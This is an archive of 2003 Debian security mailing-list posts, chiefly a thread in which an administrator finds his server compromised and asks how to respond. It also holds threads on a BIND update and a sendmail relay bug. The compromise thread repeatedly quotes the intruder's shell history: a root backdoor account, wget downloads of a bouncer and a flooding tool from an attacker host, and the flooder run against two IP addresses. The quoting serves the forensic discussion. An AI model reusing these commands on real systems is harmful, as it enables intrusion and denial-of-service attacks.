> >
> >it's the daily cronjob that stole.
> 
> yes, and that's reproducable :(
> 
> >>You think the server got hacked? Are there any other things that can
> >>lead to this? man also behaves strange, it says either "No manual entry
> >>for...", "What manual page do you want?" or nothing.
> >
> >
> >i'm thinking about a hardware problem. 
> >may the harddrive is in failure (get the ouput of dmesg) or a very big
> >ram problem that corrupt files on the hard drive.
> 
> request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
> ptrace uses obsolete (PF_INET,SOCK_PACKET)
> eth0: Promiscuous mode enabled.
> device eth0 entered promiscuous mode
> eth0: Promiscuous mode enabled.
> 
> but nothing about the disks
> 
> >in every case simply copy all the data you can and inspect the hdd in
> >another box mounting it read only.
> 
> setuid.changes lists /dev/* and the following programs:
> pppd
> postdrop
> postqueue
> wall
> newgrp
> at
> chage
> chfn
> chsh
> expiry
> gpasswd
> passwd
> write
> crontab
> dotlockfile
> ssh-keysign
> procmail
> lockfile
> popauth
> pt_chown
> traceroute
> mount
> umount
> login
> su
> ping
> suexec
> /usr/lib/mc/bin/cons.saver
> 
> and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
> 
> in /etc/.rpn theres a .bash_history with the following content:
> 
> >id
> >mkdir /etc/.rpn
> >ps -aux
> >ps -aux | grep tbk
> >kill -15292 pid
> >kill 15292
> >netconf
> >locate httpd.conf
> >cd /etc/.rpn
> >ls -al
> >wget
> >cd /var/www/cncmap/www/upload/renegade
> >ls -al
> >rm -rf phpshell.php
> >cat bd.c
> >gcc -o bd bd.c
> >ftp ftp.hpg.com.br
> >rm -rf bd.c
> >cd /tmp
> >cd /etc/.rpn
> >wget www.slacks.hpg.com.br/psyBNC.tar.gz
> >tar zvxf psyBNC.tar.gz
> >tar -zvxf psyBNC.tar.gz
> >tar
> >gunzip psyBNC.tar.gz
> >tar -Acdtrux psyBNC.tar.gz
> >tar -x psyBNC.tar.gz
> >tar -Acd psyBNC.tar.gz
> >tar -cd psyBNC.tar.gz
> >tar --help
> >pwd
> >ls
> >rm -rf *
> >wget www.slacks.hpg.com.br/bin/dos
> >chmod +x dos
> >./dos
> >./dos 200.101.87.8 65535 8569
> >./dos 200.199.95.11 65535 8569
> 
> and the executable dos
> 
> interesting is the line "tar --help" :D
> 
> in "last" I see the following:
> 
> >slacks   pts/0Sun Sep 14 02:26 - 03:37  (01:11) 
> >200-147-107-35.tlm.dialuol.com.br
> 
> IP of the hacker is 200.147.107.35
> I think we have no chance of legal actions against .br?
> 
> in the directory /var/www/cncmap/www/upload/renegade there are the
> following files: backhole.pl
> e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, 
> LES-EXPLOIT for Linux x86")
> rem.php (phpRemoteView)
> 
> so we got hacked :(
> 
> what informations should we gather before we reinstall the complete
> server? I think we have to reinstall the whole thing or do you have
> any ideas?
> 
> thanks
> Markus
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact 
> [EMAIL PROTECTED]
>

Re: Verisign and Bind update

2003-09-18 Thread Adrian von Bidder 
On Thursday 18 September 2003 10:45, Adrian von Bidder wrote:

> rndc stops working for me. Anybody else seen this?
>
> [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> rndc: connect failed: connection refused

(yes, yes,  replying to meself...)

Ok: reason: named now runs as root instead of bind, so it couldn't read the 
rndc.key file. Is this intentional? I was upgrading from current testing.

Another thing: still missing versioned dependency on one of these libraries:
libdns10, libisc7, libisccc0, libisccfg0, liblwres1

(Dunno which one is really necessary, I just upgraded all depends after it 
complained about config file unexpected token delegation-only.)

But all in all, a very very big THANK YOU to LaMont Jones & the ISC for 
'resolving' this problem so quickly. Now I just hope Verislime doesn't start 
to dynamically generate delegations, too...

greets
-- vbi


-- 
precious


pgp0.pgp
Description: signature

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel 

Ralf Dreibrodt wrote:

Hi,

Markus Schabel wrote:


I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable was bigger
after the segfault.



try the following:

md5sum /bin/gzip

0abb7d14a76380d67843e5c24cc5bfc3  /bin/gzip

scp goodserver:/bin/gzip /bin/gzip

NO! Since there's the chance that the server got hacked I'm not
interested to give him other passwords. copied from the other server
via scp.

md5sum /bin/gzip

8ab687ecd2bef48937b4b08165206a9d  /bin/gzip

ls /bin/gzip
md5sum /bin/gzip

0abb7d14a76380d67843e5c24cc5bfc3  /bin/gzip

can you send the output?





i had the same problem on a few servers, every file was bigger before
the ls, but still worked.
beside gzip, it segfaultet.
you can also strace ls, normally ls does nothing in /proc, but this ls
had done anything in /proc.

But where is it from?
Have you installed/executed any binarys beside debian-packages?


No. see my other posting, there's quite a lot of info in it...


Regards,
Ralf Dreibrodt




thanks markus

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel 

Laurent Corbes {Caf'} wrote:

On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel <[EMAIL PROTECTED]> wrote:



I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable was bigger
after the segfault.



curious.



In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
idea where they come from.



it's the daily cronjob that stole.


yes, and that's reproducable :(


You think the server got hacked? Are there any other things that can
lead to this? man also behaves strange, it says either "No manual entry
for...", "What manual page do you want?" or nothing.



i'm thinking about a hardware problem. 
may the harddrive is in failure (get the ouput of dmesg) or a very big

ram problem that corrupt files on the hard drive.


request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
ptrace uses obsolete (PF_INET,SOCK_PACKET)
eth0: Promiscuous mode enabled.
device eth0 entered promiscuous mode
eth0: Promiscuous mode enabled.

but nothing about the disks


in every case simply copy all the data you can and inspect the hdd in
another box mounting it read only.


setuid.changes lists /dev/* and the following programs:
pppd
postdrop
postqueue
wall
newgrp
at
chage
chfn
chsh
expiry
gpasswd
passwd
write
crontab
dotlockfile
ssh-keysign
procmail
lockfile
popauth
pt_chown
traceroute
mount
umount
login
su
ping
suexec
/usr/lib/mc/bin/cons.saver

and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash

in /etc/.rpn theres a .bash_history with the following content:


id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
kill 15292
netconf
locate httpd.conf
cd /etc/.rpn
ls -al
wget
cd /var/www/cncmap/www/upload/renegade
ls -al
rm -rf phpshell.php
cat bd.c
gcc -o bd bd.c
ftp ftp.hpg.com.br
rm -rf bd.c
cd /tmp
cd /etc/.rpn
wget www.slacks.hpg.com.br/psyBNC.tar.gz
tar zvxf psyBNC.tar.gz
tar -zvxf psyBNC.tar.gz
tar
gunzip psyBNC.tar.gz
tar -Acdtrux psyBNC.tar.gz
tar -x psyBNC.tar.gz
tar -Acd psyBNC.tar.gz
tar -cd psyBNC.tar.gz
tar --help
pwd
ls
rm -rf *
wget www.slacks.hpg.com.br/bin/dos
chmod +x dos
./dos
./dos 200.101.87.8 65535 8569
./dos 200.199.95.11 65535 8569


and the executable dos

interesting is the line "tar --help" :D

in "last" I see the following:


slacks   pts/0Sun Sep 14 02:26 - 03:37  (01:11) 
200-147-107-35.tlm.dialuol.com.br


IP of the hacker is 200.147.107.35
I think we have no chance of legal actions against .br?

in the directory /var/www/cncmap/www/upload/renegade there are the
following files: backhole.pl
e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, 
LES-EXPLOIT for Linux x86")

rem.php (phpRemoteView)

so we got hacked :(

what informations should we gather before we reinstall the complete
server? I think we have to reinstall the whole thing or do you have
any ideas?

thanks
Markus

Re: Verisign and Bind update

2003-09-18 Thread Lukas Ruf 
-BEGIN PGP SIGNED MESSAGE-

Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 10:48]:

> On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
> > ke, 2003-09-17 kello 18:12, James Miller kirjoitti:
> > > Will the package maintainers of BIND be integrating the patches from
> > > ISC-BIND to negate  Verisign's recent shenanigans?
> >
> > Well, it's not only a patch, it's part of bind upstream releases, so yes
> > of course it will eventually be in the packaged version.
> >
> > Actually, there already seems to be a release with this available.
> 
> rndc stops working for me. Anybody else seen this?
> 

have you checked the documentation that comes along with the update?

> [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> rndc: connect failed: connection refused
> 

for me, it worked fine after doing the modifications "recommended" in
the short doc.

wbr,
Lukas
- -- 
Lukas Ruf   | Wanna know anything about raw |
 | IP?     |
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (GNU/Linux)

iQCVAwUBP2l0eWg5P0zSC6LtAQGgXAP/br/9I3W6CymnbJ4SRKNz0U20E5D5CkAL
3ITJKHhJidsmayKQ5ICcOhMJpBbcm+tQbg+ADy3rHQ6Hkl56RTFecd2FhaeAzlGV
4+PQSu6cNpgh0Cw13mD1hpH3qxFyt2kuAsaBEhmLksQOSvBGORRVlEE3fKX0lulr
9HTwTHnbf4s=
=8lB7
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Verisign and Bind update

2003-09-18 Thread Adrian von Bidder 
On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
> ke, 2003-09-17 kello 18:12, James Miller kirjoitti:
> > Will the package maintainers of BIND be integrating the patches from
> > ISC-BIND to negate  Verisign's recent shenanigans?
>
> Well, it's not only a patch, it's part of bind upstream releases, so yes
> of course it will eventually be in the packaged version.
>
> Actually, there already seems to be a release with this available.

rndc stops working for me. Anybody else seen this?

[EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
rndc: connect failed: connection refused


cheers
-- vbi

-- 
All bridge hands are equally likely, but some are more equally likely
than others.
-- Alan Truscott


pgp0.pgp
Description: signature

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Ralf Dreibrodt 
Hi,

Markus Schabel wrote:
> 
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaultet.
> I've copied gzip from another server over the version on this server,
> but it also crashed. Interesting was that the executable was bigger
> after the segfault.

try the following:

md5sum /bin/gzip
scp goodserver:/bin/gzip /bin/gzip
md5sum /bin/gzip
ls /bin/gzip
md5sum /bin/gzip

can you send the output?

i had the same problem on a few servers, every file was bigger before
the ls, but still worked.
beside gzip, it segfaultet.
you can also strace ls, normally ls does nothing in /proc, but this ls
had done anything in /proc.

But where is it from?
Have you installed/executed any binarys beside debian-packages?

Regards,
Ralf Dreibrodt

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Christian Storch 
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.

Christian

- Original Message -
From: "Josh Carroll" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, September 18, 2003 9:12 AM
Subject: Re: Strange segmentation faults and Zombies


> Backup /etc and any other data you have, and you can reference your configuration 
> files later
> during your re-install.
>
> At this point, re-installation is a must. Never delude yourself into thinking you 
> can 'recover'
> from being rooted. Sure, you might be able to do so after a lot of effort/etc, but 
> then again
maybe
> you'll forget something and a backdoor will remain. Best bet is to re-install, 
> referencing your
> existing configuration files (though I would NOT use them as-is without inspection, 
> since they
> could potentially have backdoor'd the configs as well).
>
> Good luck.
>
> Josh
>
>
> Markus Schabel ([EMAIL PROTECTED]) wrote:
> > Laurent Corbes {Caf'} wrote:
> > >On Wed, 17 Sep 2003 22:29:58 +0200
> > >Markus Schabel <[EMAIL PROTECTED]> wrote:
> > >
> > >
> > >>I've seen some strange things on my (stable with security-updates)
> > >>server: the last apt-get update didn't work because gzip segfaultet.
> > >>I've copied gzip from another server over the version on this server,
> > >>but it also crashed. Interesting was that the executable was bigger
> > >>after the segfault.
> > >
> > >
> > >curious.
> > >
> > >
> > >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> > >>idea where they come from.
> > >
> > >
> > >it's the daily cronjob that stole.
> >
> > yes, and that's reproducable :(
> >
> > >>You think the server got hacked? Are there any other things that can
> > >>lead to this? man also behaves strange, it says either "No manual entry
> > >>for...", "What manual page do you want?" or nothing.
> > >
> > >
> > >i'm thinking about a hardware problem.
> > >may the harddrive is in failure (get the ouput of dmesg) or a very big
> > >ram problem that corrupt files on the hard drive.
> >
> > request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
> > ptrace uses obsolete (PF_INET,SOCK_PACKET)
> > eth0: Promiscuous mode enabled.
> > device eth0 entered promiscuous mode
> > eth0: Promiscuous mode enabled.
> >
> > but nothing about the disks
> >
> > >in every case simply copy all the data you can and inspect the hdd in
> > >another box mounting it read only.
> >
> > setuid.changes lists /dev/* and the following programs:
> > pppd
> > postdrop
> > postqueue
> > wall
> > newgrp
> > at
> > chage
> > chfn
> > chsh
> > expiry
> > gpasswd
> > passwd
> > write
> > crontab
> > dotlockfile
> > ssh-keysign
> > procmail
> > lockfile
> > popauth
> > pt_chown
> > traceroute
> > mount
> > umount
> > login
> > su
> > ping
> > suexec
> > /usr/lib/mc/bin/cons.saver
> >
> > and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
> >
> > in /etc/.rpn theres a .bash_history with the following content:
> >
> > >id
> > >mkdir /etc/.rpn
> > >ps -aux
> > >ps -aux | grep tbk
> > >kill -15292 pid
> > >kill 15292
> > >netconf
> > >locate httpd.conf
> > >cd /etc/.rpn
> > >ls -al
> > >wget
> > >cd /var/www/cncmap/www/upload/renegade
> > >ls -al
> > >rm -rf phpshell.php
> > >cat bd.c
> > >gcc -o bd bd.c
> > >ftp ftp.hpg.com.br
> > >rm -rf bd.c
> > >cd /tmp
> > >cd /etc/.rpn
> > >wget www.slacks.hpg.com.br/psyBNC.tar.gz
> > >tar zvxf psyBNC.tar.gz
> > >tar -zvxf psyBNC.tar.gz
> > >tar
> > >gunzip psyBNC.tar.gz
> > >tar -Acdtrux psyBNC.tar.gz
> > >tar -x psyBNC.tar.gz
> > >tar -Acd psyBNC.tar.gz
> > >tar -cd psyBNC.tar.gz
> > >tar --help
> > >pwd
> > >ls
> > >rm -rf *
> > >wget www.slacks.hpg.com.br/bin/dos
> > >chmod +x dos
> > >./dos
> > >./dos 200.101.87.8 65535 8569
> > >./dos 200.199.95.11 65535 8569
> >
> > and the executable dos
> >
> > interesting is the line "tar --help" :D
> >
> > in "last" I see the following:
> >
> > >slacks   pts/0Sun Sep 14 02:26 - 03:37  (01:11)
> > >200-147-107-35.tlm.dialuol.com.br
> >
> > IP of the hacker is 200.147.107.35
> > I think we have no chance of legal actions against .br?
> >
> > in the directory /var/www/cncmap/www/upload/renegade there are the
> > following files: backhole.pl
> > e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003,
> > LES-EXPLOIT for Linux x86")
> > rem.php (phpRemoteView)
> >
> > so we got hacked :(
> >
> > what informations should we gather before we reinstall the complete
> > server? I think we have to reinstall the whole thing or do you have
> > any ideas?
> >
> > thanks
> > Markus
> >
> >
> > --
> > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > with a subject of "unsubscribe". Trouble? Contact
> > [EMAIL PROTECTED]
> >
>
>
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
>


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: about sendmail hole - relay restrictions bypassed

2003-09-18 Thread Jeremy T. Bouse 
In all fairness, if this issue is in regards to the Verisign cluster
fsck I don't think this has any place in Sendmail personally but rather
in getting Verisign to un-fsck the problem and/or fix DNS servers not to
respond in that manner as to allow that to happen...

Regards,
Jeremy

On Thu, Sep 18, 2003 at 12:49:38PM +0900, Hideki Yamane wrote:
> Hi list,
> 
>  You know, as DSA-384-1, sendmail buffer overflow vulnerability
>  is fixed but another hole "sendmail relay access restrictions 
>  can be bypassed with bogus DNS"(*) is NOT fixed yet.
> 
>  * http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=174907
> 
>  Do you know why maintainer let this issue alone ?
>  or not effect Debian package? (if so, this bug should be closed.)
> 
> -- 
> Regards,
> 
>  Hideki Yamanemailto:henrich @ iijmio-mail.jp
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 


signature.asc
Description: Digital signature

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Josh Carroll 
Backup /etc and any other data you have, and you can reference your configuration 
files later
during your re-install.

At this point, re-installation is a must. Never delude yourself into thinking you can 
'recover'
from being rooted. Sure, you might be able to do so after a lot of effort/etc, but 
then again maybe
you'll forget something and a backdoor will remain. Best bet is to re-install, 
referencing your
existing configuration files (though I would NOT use them as-is without inspection, 
since they
could potentially have backdoor'd the configs as well).

Good luck.

Josh


Markus Schabel ([EMAIL PROTECTED]) wrote:
> Laurent Corbes {Caf'} wrote:
> >On Wed, 17 Sep 2003 22:29:58 +0200
> >Markus Schabel <[EMAIL PROTECTED]> wrote:
> >
> >
> >>I've seen some strange things on my (stable with security-updates)
> >>server: the last apt-get update didn't work because gzip segfaultet.
> >>I've copied gzip from another server over the version on this server,
> >>but it also crashed. Interesting was that the executable was bigger
> >>after the segfault.
> >
> >
> >curious.
> >
> >
> >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> >>idea where they come from.
> >
> >
> >it's the daily cronjob that stole.
> 
> yes, and that's reproducable :(
> 
> >>You think the server got hacked? Are there any other things that can
> >>lead to this? man also behaves strange, it says either "No manual entry
> >>for...", "What manual page do you want?" or nothing.
> >
> >
> >i'm thinking about a hardware problem. 
> >may the harddrive is in failure (get the ouput of dmesg) or a very big
> >ram problem that corrupt files on the hard drive.
> 
> request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
> ptrace uses obsolete (PF_INET,SOCK_PACKET)
> eth0: Promiscuous mode enabled.
> device eth0 entered promiscuous mode
> eth0: Promiscuous mode enabled.
> 
> but nothing about the disks
> 
> >in every case simply copy all the data you can and inspect the hdd in
> >another box mounting it read only.
> 
> setuid.changes lists /dev/* and the following programs:
> pppd
> postdrop
> postqueue
> wall
> newgrp
> at
> chage
> chfn
> chsh
> expiry
> gpasswd
> passwd
> write
> crontab
> dotlockfile
> ssh-keysign
> procmail
> lockfile
> popauth
> pt_chown
> traceroute
> mount
> umount
> login
> su
> ping
> suexec
> /usr/lib/mc/bin/cons.saver
> 
> and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
> 
> in /etc/.rpn theres a .bash_history with the following content:
> 
> >id
> >mkdir /etc/.rpn
> >ps -aux
> >ps -aux | grep tbk
> >kill -15292 pid
> >kill 15292
> >netconf
> >locate httpd.conf
> >cd /etc/.rpn
> >ls -al
> >wget
> >cd /var/www/cncmap/www/upload/renegade
> >ls -al
> >rm -rf phpshell.php
> >cat bd.c
> >gcc -o bd bd.c
> >ftp ftp.hpg.com.br
> >rm -rf bd.c
> >cd /tmp
> >cd /etc/.rpn
> >wget www.slacks.hpg.com.br/psyBNC.tar.gz
> >tar zvxf psyBNC.tar.gz
> >tar -zvxf psyBNC.tar.gz
> >tar
> >gunzip psyBNC.tar.gz
> >tar -Acdtrux psyBNC.tar.gz
> >tar -x psyBNC.tar.gz
> >tar -Acd psyBNC.tar.gz
> >tar -cd psyBNC.tar.gz
> >tar --help
> >pwd
> >ls
> >rm -rf *
> >wget www.slacks.hpg.com.br/bin/dos
> >chmod +x dos
> >./dos
> >./dos 200.101.87.8 65535 8569
> >./dos 200.199.95.11 65535 8569
> 
> and the executable dos
> 
> interesting is the line "tar --help" :D
> 
> in "last" I see the following:
> 
> >slacks   pts/0Sun Sep 14 02:26 - 03:37  (01:11) 
> >200-147-107-35.tlm.dialuol.com.br
> 
> IP of the hacker is 200.147.107.35
> I think we have no chance of legal actions against .br?
> 
> in the directory /var/www/cncmap/www/upload/renegade there are the
> following files: backhole.pl
> e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, 
> LES-EXPLOIT for Linux x86")
> rem.php (phpRemoteView)
> 
> so we got hacked :(
> 
> what informations should we gather before we reinstall the complete
> server? I think we have to reinstall the whole thing or do you have
> any ideas?
> 
> thanks
> Markus
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact 
> [EMAIL PROTECTED]
> 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel 
Ralf Dreibrodt wrote:
Hi,

Markus Schabel wrote:

I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable was bigger
after the segfault.


try the following:

md5sum /bin/gzip
0abb7d14a76380d67843e5c24cc5bfc3  /bin/gzip
scp goodserver:/bin/gzip /bin/gzip
NO! Since there's the chance that the server got hacked I'm not
interested to give him other passwords. copied from the other server
via scp.
md5sum /bin/gzip
8ab687ecd2bef48937b4b08165206a9d  /bin/gzip
ls /bin/gzip
md5sum /bin/gzip
0abb7d14a76380d67843e5c24cc5bfc3  /bin/gzip
can you send the output?



i had the same problem on a few servers, every file was bigger before
the ls, but still worked.
beside gzip, it segfaultet.
you can also strace ls, normally ls does nothing in /proc, but this ls
had done anything in /proc.
But where is it from?
Have you installed/executed any binarys beside debian-packages?
No. see my other posting, there's quite a lot of info in it...

Regards,
Ralf Dreibrodt

thanks markus

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel 
Laurent Corbes {Caf'} wrote:
On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel <[EMAIL PROTECTED]> wrote:

I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable was bigger
after the segfault.


curious.


In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
idea where they come from.


it's the daily cronjob that stole.
yes, and that's reproducable :(

You think the server got hacked? Are there any other things that can
lead to this? man also behaves strange, it says either "No manual entry
for...", "What manual page do you want?" or nothing.


i'm thinking about a hardware problem. 
may the harddrive is in failure (get the ouput of dmesg) or a very big
ram problem that corrupt files on the hard drive.
request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
ptrace uses obsolete (PF_INET,SOCK_PACKET)
eth0: Promiscuous mode enabled.
device eth0 entered promiscuous mode
eth0: Promiscuous mode enabled.
but nothing about the disks

in every case simply copy all the data you can and inspect the hdd in
another box mounting it read only.
setuid.changes lists /dev/* and the following programs:
pppd
postdrop
postqueue
wall
newgrp
at
chage
chfn
chsh
expiry
gpasswd
passwd
write
crontab
dotlockfile
ssh-keysign
procmail
lockfile
popauth
pt_chown
traceroute
mount
umount
login
su
ping
suexec
/usr/lib/mc/bin/cons.saver
and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash

in /etc/.rpn theres a .bash_history with the following content:

id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
kill 15292
netconf
locate httpd.conf
cd /etc/.rpn
ls -al
wget
cd /var/www/cncmap/www/upload/renegade
ls -al
rm -rf phpshell.php
cat bd.c
gcc -o bd bd.c
ftp ftp.hpg.com.br
rm -rf bd.c
cd /tmp
cd /etc/.rpn
wget www.slacks.hpg.com.br/psyBNC.tar.gz
tar zvxf psyBNC.tar.gz
tar -zvxf psyBNC.tar.gz
tar
gunzip psyBNC.tar.gz
tar -Acdtrux psyBNC.tar.gz
tar -x psyBNC.tar.gz
tar -Acd psyBNC.tar.gz
tar -cd psyBNC.tar.gz
tar --help
pwd
ls
rm -rf *
wget www.slacks.hpg.com.br/bin/dos
chmod +x dos
./dos
./dos 200.101.87.8 65535 8569
./dos 200.199.95.11 65535 8569
and the executable dos

interesting is the line "tar --help" :D

in "last" I see the following:

slacks   pts/0Sun Sep 14 02:26 - 03:37  (01:11) 200-147-107-35.tlm.dialuol.com.br
IP of the hacker is 200.147.107.35
I think we have no chance of legal actions against .br?
in the directory /var/www/cncmap/www/upload/renegade there are the
following files: backhole.pl
e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, 
LES-EXPLOIT for Linux x86")
rem.php (phpRemoteView)

so we got hacked :(

what informations should we gather before we reinstall the complete
server? I think we have to reinstall the whole thing or do you have
any ideas?
thanks
Markus
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]